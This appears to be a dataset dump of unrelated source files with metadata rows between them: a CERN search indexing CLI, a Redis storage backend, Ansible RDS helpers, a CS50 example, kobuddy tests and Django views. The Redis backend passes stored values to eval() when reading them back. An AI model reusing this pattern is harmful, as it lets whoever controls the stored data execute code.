"""Run bulk record indexing."""
es_bulk_kwargs = {
"raise_on_error": raise_on_error,
"chunk_size": chunk_size,
"max_chunk_bytes": max_chunk_bytes,
}
if delayed:
celery_kwargs = {"kwargs": {"version_type": version_type, "es_bulk_kwargs": es_bulk_kwargs}}
click.secho("Starting {0} tasks for indexing records...".format(concurrency), fg="green")
if queue is not None:
celery_kwargs.update({"queue": queue})
for c in range(0, concurrency):
process_bulk_queue.apply_async(**celery_kwargs)
else:
click.secho("Indexing records...", fg="green")
CernSearchRecordIndexer(version_type=version_type).process_bulk_queue(es_bulk_kwargs=es_bulk_kwargs)
@utils.command("reindex")
@click.option(
"--yes-i-know",
is_flag=True,
callback=abort_if_false,
expose_value=False,
prompt="Do you really want to reindex all records?",
)
@click.option("-t", "--pid-type", multiple=True, required=True)
@click.option("-i", "--id", "id_list", help="List of ids.", multiple=True)
@click.option("-d", "--doc-type", required=False)
@with_appcontext
def reindex(pid_type, id_list, doc_type=None):
"""Reindex all records.
:param pid_type: Pid type.
:param id_list: List of ids.
:param doc_type: Doc type
"""
click.secho("Sending records to indexing queue ...", fg="green")
query = id_list
if not query:
query = (
PersistentIdentifier.query.filter_by(object_type="rec", status=PIDStatus.REGISTERED)
.join(RecordMetadata, PersistentIdentifier.object_uuid == RecordMetadata.id)
.filter(PersistentIdentifier.pid_type.in_(pid_type))
)
if doc_type:
query = query.filter(RecordMetadata.json.op("->>")("$schema").contains(doc_type))
query = (x[0] for x in query.yield_per(100).values(PersistentIdentifier.object_uuid))
CernSearchRecordIndexer().bulk_index(query)
click.secho('Execute "run" command to process the queue!', fg="yellow")
@utils.command("index-init")
@click.argument("index_name")
@click.option("-f", "--force", is_flag=True, default=False)
@click.option("-v", "--verbose", is_flag=True, default=False)
@with_appcontext
@es_version_check
def index_init(index_name, force, verbose):
"""Init index by its name."""
results = list(current_search.create(index_list=[index_name], ignore_existing=force))
if verbose:
click.echo(json.dumps(results))
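A hedged sketch of driving the group above with click's test runner; a real invocation needs the Invenio/Flask application context (with_appcontext), so this only demonstrates the wiring:
# Invoke 'utils runindex' in-process instead of via the shell.
from click.testing import CliRunner

from cern_search_rest_api.modules.cernsearch.cli import utils

result = CliRunner().invoke(utils, ["runindex", "--delayed", "-c", "2"])
print(result.exit_code, result.output)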
| 30.412162
| 108
| 0.682959
| 0
| 0
| 0
| 0
| 3,626
| 0.805599
| 0
| 0
| 1,511
| 0.335703
|
221ac1f2a8c5526fcda12d6ed18346f9e5d9d58a
| 906
|
py
|
Python
|
kasaya/core/backend/redisstore.py
|
AYAtechnologies/Kasaya-esb
|
150fa96d4136641cd4632f3c9a09d4fc2610df07
|
[
"BSD-2-Clause"
] | 1
|
2015-06-26T18:05:20.000Z
|
2015-06-26T18:05:20.000Z
|
kasaya/core/backend/redisstore.py
|
AYAtechnologies/Kasaya-esb
|
150fa96d4136641cd4632f3c9a09d4fc2610df07
|
[
"BSD-2-Clause"
] | null | null | null |
kasaya/core/backend/redisstore.py
|
AYAtechnologies/Kasaya-esb
|
150fa96d4136641cd4632f3c9a09d4fc2610df07
|
[
"BSD-2-Clause"
] | null | null | null |
__author__ = 'wektor'

import ast

import redis

# explicit relative import, assuming generic.py is a sibling module
from .generic import GenericBackend
class RedisBackend(GenericBackend):
def __init__(self):
pool = redis.ConnectionPool(host='localhost', port=6379, db=0)
self.store = redis.Redis(connection_pool=pool)
def get_typecode(self, value):
typecode = str(type(value)).split("'")[1]
return typecode
def set(self, key, value):
data = {}
data["type"] = self.get_typecode(value)
data["data"] = value
self.store.hmset(key, data)
# def update(self, key, value):
def get(self, key):
data = self.store.hgetall(key)
        print(data)
try:
if data["type"] != "str":
return eval(data["data"])
else:
return data["data"]
except KeyError:
return {}
def delete(self, key):
self.store.delete(key)
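A hypothetical round trip against a Redis server on localhost:6379; the key and payload are made up, and note that hmset is deprecated in newer redis-py releases:
from kasaya.core.backend.redisstore import RedisBackend

backend = RedisBackend()
backend.set("job:1", {"status": "queued", "retries": 0})
print(backend.get("job:1"))   # -> {'status': 'queued', 'retries': 0}
backend.delete("job:1")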
| 25.166667
| 71
| 0.562914
| 833
| 0.919426
| 0
| 0
| 0
| 0
| 0
| 0
| 88
| 0.09713
|
221b92eff3eb5754a23903956aeef1d20d52980f
| 11,288
|
py
|
Python
|
venv/lib/python3.6/site-packages/ansible_collections/amazon/aws/plugins/module_utils/rds.py
|
usegalaxy-no/usegalaxy
|
75dad095769fe918eb39677f2c887e681a747f3a
|
[
"MIT"
] | 22
|
2021-07-16T08:11:22.000Z
|
2022-03-31T07:15:34.000Z
|
venv/lib/python3.6/site-packages/ansible_collections/amazon/aws/plugins/module_utils/rds.py
|
usegalaxy-no/usegalaxy
|
75dad095769fe918eb39677f2c887e681a747f3a
|
[
"MIT"
] | 12
|
2020-02-21T07:24:52.000Z
|
2020-04-14T09:54:32.000Z
|
venv/lib/python3.6/site-packages/ansible_collections/amazon/aws/plugins/module_utils/rds.py
|
usegalaxy-no/usegalaxy
|
75dad095769fe918eb39677f2c887e681a747f3a
|
[
"MIT"
] | 39
|
2021-07-05T02:31:42.000Z
|
2022-03-31T02:46:03.000Z
|
# Copyright: (c) 2018, Ansible Project
# GNU General Public License v3.0+ (see COPYING or https://www.gnu.org/licenses/gpl-3.0.txt)
from __future__ import (absolute_import, division, print_function)
__metaclass__ = type
from collections import namedtuple
from time import sleep
try:
from botocore.exceptions import BotoCoreError, ClientError, WaiterError
except ImportError:
pass
from ansible.module_utils._text import to_text
from ansible.module_utils.common.dict_transformations import snake_dict_to_camel_dict
from .ec2 import AWSRetry
from .ec2 import ansible_dict_to_boto3_tag_list
from .ec2 import boto3_tag_list_to_ansible_dict
from .ec2 import compare_aws_tags
from .waiters import get_waiter
Boto3ClientMethod = namedtuple('Boto3ClientMethod', ['name', 'waiter', 'operation_description', 'cluster', 'instance'])
# Whitelist boto3 client methods for cluster and instance resources
cluster_method_names = [
'create_db_cluster', 'restore_db_cluster_from_db_snapshot', 'restore_db_cluster_from_s3',
'restore_db_cluster_to_point_in_time', 'modify_db_cluster', 'delete_db_cluster', 'add_tags_to_resource',
'remove_tags_from_resource', 'list_tags_for_resource', 'promote_read_replica_db_cluster'
]
instance_method_names = [
'create_db_instance', 'restore_db_instance_to_point_in_time', 'restore_db_instance_from_s3',
'restore_db_instance_from_db_snapshot', 'create_db_instance_read_replica', 'modify_db_instance',
'delete_db_instance', 'add_tags_to_resource', 'remove_tags_from_resource', 'list_tags_for_resource',
'promote_read_replica', 'stop_db_instance', 'start_db_instance', 'reboot_db_instance'
]
def get_rds_method_attribute(method_name, module):
readable_op = method_name.replace('_', ' ').replace('db', 'DB')
if method_name in cluster_method_names and 'new_db_cluster_identifier' in module.params:
cluster = True
instance = False
if method_name == 'delete_db_cluster':
waiter = 'cluster_deleted'
else:
waiter = 'cluster_available'
elif method_name in instance_method_names and 'new_db_instance_identifier' in module.params:
cluster = False
instance = True
if method_name == 'delete_db_instance':
waiter = 'db_instance_deleted'
elif method_name == 'stop_db_instance':
waiter = 'db_instance_stopped'
else:
waiter = 'db_instance_available'
else:
raise NotImplementedError("method {0} hasn't been added to the list of accepted methods to use a waiter in module_utils/rds.py".format(method_name))
return Boto3ClientMethod(name=method_name, waiter=waiter, operation_description=readable_op, cluster=cluster, instance=instance)
def get_final_identifier(method_name, module):
apply_immediately = module.params['apply_immediately']
if get_rds_method_attribute(method_name, module).cluster:
identifier = module.params['db_cluster_identifier']
updated_identifier = module.params['new_db_cluster_identifier']
elif get_rds_method_attribute(method_name, module).instance:
identifier = module.params['db_instance_identifier']
updated_identifier = module.params['new_db_instance_identifier']
else:
raise NotImplementedError("method {0} hasn't been added to the list of accepted methods in module_utils/rds.py".format(method_name))
if not module.check_mode and updated_identifier and apply_immediately:
identifier = updated_identifier
return identifier
def handle_errors(module, exception, method_name, parameters):
if not isinstance(exception, ClientError):
module.fail_json_aws(exception, msg="Unexpected failure for method {0} with parameters {1}".format(method_name, parameters))
changed = True
error_code = exception.response['Error']['Code']
if method_name == 'modify_db_instance' and error_code == 'InvalidParameterCombination':
if 'No modifications were requested' in to_text(exception):
changed = False
elif 'ModifyDbCluster API' in to_text(exception):
module.fail_json_aws(exception, msg='It appears you are trying to modify attributes that are managed at the cluster level. Please see rds_cluster')
else:
module.fail_json_aws(exception, msg='Unable to {0}'.format(get_rds_method_attribute(method_name, module).operation_description))
elif method_name == 'promote_read_replica' and error_code == 'InvalidDBInstanceState':
if 'DB Instance is not a read replica' in to_text(exception):
changed = False
else:
module.fail_json_aws(exception, msg='Unable to {0}'.format(get_rds_method_attribute(method_name, module).operation_description))
    elif method_name == 'create_db_instance' and error_code == 'InvalidParameterValue':
accepted_engines = [
'aurora', 'aurora-mysql', 'aurora-postgresql', 'mariadb', 'mysql', 'oracle-ee', 'oracle-se',
'oracle-se1', 'oracle-se2', 'postgres', 'sqlserver-ee', 'sqlserver-ex', 'sqlserver-se', 'sqlserver-web'
]
if parameters.get('Engine') not in accepted_engines:
module.fail_json_aws(exception, msg='DB engine {0} should be one of {1}'.format(parameters.get('Engine'), accepted_engines))
else:
module.fail_json_aws(exception, msg='Unable to {0}'.format(get_rds_method_attribute(method_name, module).operation_description))
else:
module.fail_json_aws(exception, msg='Unable to {0}'.format(get_rds_method_attribute(method_name, module).operation_description))
return changed
def call_method(client, module, method_name, parameters):
result = {}
changed = True
if not module.check_mode:
wait = module.params['wait']
# TODO: stabilize by adding get_rds_method_attribute(method_name).extra_retry_codes
method = getattr(client, method_name)
try:
if method_name == 'modify_db_instance':
# check if instance is in an available state first, if possible
if wait:
wait_for_status(client, module, module.params['db_instance_identifier'], method_name)
result = AWSRetry.jittered_backoff(catch_extra_error_codes=['InvalidDBInstanceState'])(method)(**parameters)
else:
result = AWSRetry.jittered_backoff()(method)(**parameters)
except (BotoCoreError, ClientError) as e:
changed = handle_errors(module, e, method_name, parameters)
if wait and changed:
identifier = get_final_identifier(method_name, module)
wait_for_status(client, module, identifier, method_name)
return result, changed
def wait_for_instance_status(client, module, db_instance_id, waiter_name):
def wait(client, db_instance_id, waiter_name, extra_retry_codes):
retry = AWSRetry.jittered_backoff(catch_extra_error_codes=extra_retry_codes)
try:
waiter = client.get_waiter(waiter_name)
except ValueError:
# using a waiter in module_utils/waiters.py
waiter = get_waiter(client, waiter_name)
waiter.wait(WaiterConfig={'Delay': 60, 'MaxAttempts': 60}, DBInstanceIdentifier=db_instance_id)
waiter_expected_status = {
'db_instance_deleted': 'deleted',
'db_instance_stopped': 'stopped',
}
expected_status = waiter_expected_status.get(waiter_name, 'available')
if expected_status == 'available':
extra_retry_codes = ['DBInstanceNotFound']
else:
extra_retry_codes = []
for attempt_to_wait in range(0, 10):
try:
wait(client, db_instance_id, waiter_name, extra_retry_codes)
break
except WaiterError as e:
# Instance may be renamed and AWSRetry doesn't handle WaiterError
if e.last_response.get('Error', {}).get('Code') == 'DBInstanceNotFound':
sleep(10)
continue
module.fail_json_aws(e, msg='Error while waiting for DB instance {0} to be {1}'.format(db_instance_id, expected_status))
except (BotoCoreError, ClientError) as e:
module.fail_json_aws(e, msg='Unexpected error while waiting for DB instance {0} to be {1}'.format(
db_instance_id, expected_status)
)
def wait_for_cluster_status(client, module, db_cluster_id, waiter_name):
try:
        get_waiter(client, waiter_name).wait(DBClusterIdentifier=db_cluster_id)
except WaiterError as e:
if waiter_name == 'cluster_deleted':
msg = "Failed to wait for DB cluster {0} to be deleted".format(db_cluster_id)
else:
msg = "Failed to wait for DB cluster {0} to be available".format(db_cluster_id)
module.fail_json_aws(e, msg=msg)
except (BotoCoreError, ClientError) as e:
module.fail_json_aws(e, msg="Failed with an unexpected error while waiting for the DB cluster {0}".format(db_cluster_id))
def wait_for_status(client, module, identifier, method_name):
waiter_name = get_rds_method_attribute(method_name, module).waiter
if get_rds_method_attribute(method_name, module).cluster:
wait_for_cluster_status(client, module, identifier, waiter_name)
elif get_rds_method_attribute(method_name, module).instance:
wait_for_instance_status(client, module, identifier, waiter_name)
else:
raise NotImplementedError("method {0} hasn't been added to the whitelist of handled methods".format(method_name))
def get_tags(client, module, cluster_arn):
try:
return boto3_tag_list_to_ansible_dict(
client.list_tags_for_resource(ResourceName=cluster_arn)['TagList']
)
except (BotoCoreError, ClientError) as e:
module.fail_json_aws(e, msg="Unable to describe tags")
def arg_spec_to_rds_params(options_dict):
tags = options_dict.pop('tags')
has_processor_features = False
if 'processor_features' in options_dict:
has_processor_features = True
processor_features = options_dict.pop('processor_features')
camel_options = snake_dict_to_camel_dict(options_dict, capitalize_first=True)
for key in list(camel_options.keys()):
for old, new in (('Db', 'DB'), ('Iam', 'IAM'), ('Az', 'AZ')):
if old in key:
camel_options[key.replace(old, new)] = camel_options.pop(key)
camel_options['Tags'] = tags
if has_processor_features:
camel_options['ProcessorFeatures'] = processor_features
return camel_options
def ensure_tags(client, module, resource_arn, existing_tags, tags, purge_tags):
if tags is None:
return False
tags_to_add, tags_to_remove = compare_aws_tags(existing_tags, tags, purge_tags)
changed = bool(tags_to_add or tags_to_remove)
if tags_to_add:
call_method(
client, module, method_name='add_tags_to_resource',
parameters={'ResourceName': resource_arn, 'Tags': ansible_dict_to_boto3_tag_list(tags_to_add)}
)
if tags_to_remove:
call_method(
client, module, method_name='remove_tags_from_resource',
parameters={'ResourceName': resource_arn, 'TagKeys': tags_to_remove}
)
return changed
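A hedged sketch of the snake_case to CamelCase conversion performed by arg_spec_to_rds_params; the input dict is illustrative, not a full module arg spec, and running it requires the amazon.aws collection on the import path:
from ansible_collections.amazon.aws.plugins.module_utils.rds import arg_spec_to_rds_params

options = {
    'db_instance_identifier': 'mydb',   # 'Db' -> 'DB' is special-cased
    'allocated_storage': 20,
    'tags': {'env': 'test'},            # popped and re-attached as 'Tags'
}
print(arg_spec_to_rds_params(options))
# keys become 'DBInstanceIdentifier' and 'AllocatedStorage', plus 'Tags'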
| 47.830508
| 159
| 0.710578
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 3,193
| 0.282867
|
221baabdac2f34fa39aafcaa192dcd1f1b264104
| 176
|
py
|
Python
|
week06/lecture/examples/src6/2/uppercase0.py
|
uldash/CS50x
|
c3ee0f42ad514b57a13c3ffbb96238b3ca3730e1
|
[
"MIT"
] | null | null | null |
week06/lecture/examples/src6/2/uppercase0.py
|
uldash/CS50x
|
c3ee0f42ad514b57a13c3ffbb96238b3ca3730e1
|
[
"MIT"
] | null | null | null |
week06/lecture/examples/src6/2/uppercase0.py
|
uldash/CS50x
|
c3ee0f42ad514b57a13c3ffbb96238b3ca3730e1
|
[
"MIT"
] | null | null | null |
# Uppercases string one character at a time
from cs50 import get_string
s = get_string("Before: ")
print("After: ", end="")
for c in s:
print(c.upper(), end="")
print()
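The loop mirrors CS50's character-by-character C version; idiomatic Python uppercases the whole string in one call. A hedged equivalent using the same cs50 helper:
from cs50 import get_string

s = get_string("Before: ")
print("After: " + s.upper())   # str.upper returns a new uppercased copy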
| 17.6
| 43
| 0.653409
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 67
| 0.380682
|
221c5dbcccafcacd09ca66b22dfdff675d20b942
| 2,050
|
py
|
Python
|
tests/test_kobo.py
|
Donearm/kobuddy
|
9c55f2f94c3c949c4d8a5ba18704be92c055873c
|
[
"MIT"
] | 75
|
2019-08-24T14:21:53.000Z
|
2022-02-21T17:20:20.000Z
|
tests/test_kobo.py
|
Donearm/kobuddy
|
9c55f2f94c3c949c4d8a5ba18704be92c055873c
|
[
"MIT"
] | 9
|
2019-10-15T19:30:16.000Z
|
2021-08-17T15:24:00.000Z
|
tests/test_kobo.py
|
Donearm/kobuddy
|
9c55f2f94c3c949c4d8a5ba18704be92c055873c
|
[
"MIT"
] | 4
|
2020-02-05T13:53:59.000Z
|
2021-08-17T14:50:39.000Z
|
from datetime import datetime
from pathlib import Path
import pytz
import kobuddy
def get_test_db():
# db = Path(__file__).absolute().parent.parent / 'KoboShelfes' / 'KoboReader.sqlite.0'
db = Path(__file__).absolute().parent / 'data' / 'kobo_notes' / 'input' / 'KoboReader.sqlite'
return db
# a bit meh, but ok for now
kobuddy.set_databases(get_test_db())
from kobuddy import _iter_events_aux, get_events, get_books_with_highlights, _iter_highlights
def test_events():
for e in _iter_events_aux():
print(e)
def test_hls():
for h in _iter_highlights():
print(h)
def test_get_all():
events = get_events()
assert len(events) > 50
for d in events:
print(d)
def test_books_with_highlights():
pages = get_books_with_highlights()
g = pages[0]
assert 'Essentialism' in g.book
hls = g.highlights
assert len(hls) == 273
[b] = [h for h in hls if h.eid == '520b7b13-dbef-4402-9a81-0f4e0c4978de']
# TODO wonder if there might be any useful info? StartContainerPath, EndContainerPath
assert b.kind == 'bookmark'
# TODO move to a more specific test?
# TODO assert sorted by date or smth?
assert hls[0].kind == 'highlight'
# TODO assert highlights got no annotation? not sure if it's even necessary to distinguish..
[ann] = [h for h in hls if h.annotation is not None and len(h.annotation) > 0]
assert ann.eid == 'eb264817-9a06-42fd-92ff-7bd38cd9ca79'
assert ann.kind == 'annotation'
assert ann.text == 'He does this by finding which machine has the biggest queue of materials waiting behind it and finds a way to increase its efficiency.'
assert ann.annotation == 'Bottleneck'
assert ann.dt == datetime(year=2017, month=8, day=12, hour=3, minute=49, second=13, microsecond=0, tzinfo=pytz.utc)
assert ann.book.author == 'Greg McKeown'
assert len(pages) == 7
def test_history():
kobuddy.print_progress()
def test_annotations():
kobuddy.print_annotations()
def test_books():
kobuddy.print_books()
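The same helpers work outside pytest; a hedged sketch with an illustrative database path:
from pathlib import Path

import kobuddy

kobuddy.set_databases(Path("/path/to/KoboReader.sqlite"))  # made-up path
for page in kobuddy.get_books_with_highlights():
    print(page.book, len(page.highlights))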
| 28.472222
| 159
| 0.691707
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 692
| 0.337561
|
221edc811e6d0e0ea5e013272ed5a112078a3713
| 1,062
|
py
|
Python
|
tanks/views.py
|
BArdelean/djangostuff
|
b4b7b6bac5e1d8dbc73e2f5cb5a7e784a82c9519
|
[
"bzip2-1.0.6"
] | null | null | null |
tanks/views.py
|
BArdelean/djangostuff
|
b4b7b6bac5e1d8dbc73e2f5cb5a7e784a82c9519
|
[
"bzip2-1.0.6"
] | null | null | null |
tanks/views.py
|
BArdelean/djangostuff
|
b4b7b6bac5e1d8dbc73e2f5cb5a7e784a82c9519
|
[
"bzip2-1.0.6"
] | null | null | null |
from django.shortcuts import get_object_or_404, render

from .models import Tank
# Create your views here.
# The view for the created model Tank
def tank_view(request):
queryset = Tank.objects.all()
context = {
'object': queryset
}
return render(request, "tankbattle.html", context)
# Detail view for a single Tank. The original file defined four copies of
# this function (tank_1 .. tank_4), each accepting a pk argument but then
# ignoring it in favour of a hard-coded primary key; one parameterised view
# covers all of them and returns a clean 404 for a missing pk.
def tank_detail(request, pk):
    queryset = get_object_or_404(Tank, pk=pk)
    context = {
        'object': queryset
    }
    return render(request, 'tankbattle.html', context)
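A hypothetical urls.py wiring for the two views above; route names and prefixes are made up:
from django.urls import path

from . import views

urlpatterns = [
    path('tanks/', views.tank_view, name='tank-list'),
    path('tanks/<int:pk>/', views.tank_detail, name='tank-detail'),
]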
| 21.673469
| 54
| 0.65725
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 187
| 0.176083
|